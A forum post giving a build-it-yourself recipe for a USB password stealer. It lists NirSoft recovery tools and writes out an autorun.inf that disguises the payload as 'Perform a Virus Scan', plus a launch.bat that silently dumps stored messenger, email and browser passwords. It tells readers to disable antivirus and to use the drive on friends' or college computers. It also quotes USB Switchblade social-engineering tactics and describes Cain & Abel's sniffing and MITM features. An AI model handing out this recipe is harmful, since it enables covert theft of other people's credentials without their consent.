#  >  > Computers Can Be Fun >  >  > Computer News >  >  USB Password Stealer - Build your own

## dirtydog

A few ways of obtaining passwords, now USB switchblade came out in 2006 so it's pretty old and you would have to check how updated each version is, there are quite a few varitions of how it is set up and what exe files it uses, but remember, you are playing with fire if you start messing round with this stuff, you could mess up your own computer, you could be arrested if you do something illegal with any of this stuff, so its' your choice.

This is a relatively new lot of exe files along similar lines to USB Switchblade, not sure who should get credit for this as they are arguing over it on hackforums.net, so let the credit go to them all.


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.
Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friends/college Computer.

We need the following tools to create our rootkit:

*1.MessenPass:*
Recovers the passwords of most popular Instant Messenger programs

*2.Mail PassView:*
Recovers the passwords of most popular email programs:

*3.IE Passview:*
IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. 

*4.Protected Storage PassView:*
Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more

*5.PasswordFox:*
PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. 

*Download Links:*

MessenPass: MessenPass: Instant Messenger Password Recovery Tool
Mail Passview: Mail PassView: Password recovery for Outlook, Outlook Express, Thunderbird, Windows Mail, and more...
IE Passview: http://www.nirsoft.net/utils/internet_ex...sword.html
Protected Storage PassView: Protected Storage PassView v1.63: Recover Protected Storage passwords
PasswordFox: PasswordFox - Reveal the user names/passwords stored in Firefox

*How to make it:*

*NOTE:* You must temporarily disable your antivirus before following these steps, ( these files on trying to download will trip most anti viruses, you can read more about it at the download site.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from New Text Document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt

Save the Notepad and rename it from New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friends PC or on your college computer. Just follow these steps.

*Working:*

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and youll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7

USB switchblades site is worth a look as there are many variations on this piece of software.

*USB Switchblade*

From Hak5.org

The goal of the USB Switchblade is to silently recover information from a target Windows 2000 or higher computer, including password hashes, LSA secrets, IP information, etc... Several methods for silent activation exist including the original MaxDamage technique of using a special autorun loader on the virtual CD-ROM partition of a U3 compatible USB key, and the original Amish technique of using social engineering to trick a user into running the autorun when choosing "Open folder to display files" upon insertion.

While the USB Switchblade does require a system running Windows 2000, XP, or 2003 logged in with Administrative privledges and physical access the beauty lies in the fact that the payload can run silently and without modifying the system or sending network traffic, making it near invisible. For example the USB Switchblade can be used to retrieve information from a target system at a LAN party by lending the key to an unsuspecting individual with the intent to distribute a game patch or other such warez. 








Cain and Abel does a lot of stuff and password sniffing is just a bit of the things it can do, this software has been going for years and is definetly worth a play with for those with a brave heart, but don't come crying to me if you fuk up your computer system or whatever.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. 
It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. 

The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. 

It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

 The latest version is faster and contains a lot of new features like APR (Arp Poison Routing) which enables sniffing on switched LANs and Man-in-the-Middle attacks. 

The sniffer in this version can also analyze encrypted protocols such as SSH-1 and HTTPS, and contains filters to capture credentials from a wide range of authentication mechanisms. 

The new version also ships routing protocols authentication monitors and routes extractors, dictionary and brute-force crackers for all common hashing algorithms and for several specific authentications, password/hash calculators, cryptanalysis attacks, password decoders and some not so common utilities related to network and system security.

oxid.it - Cain & Abel

----------

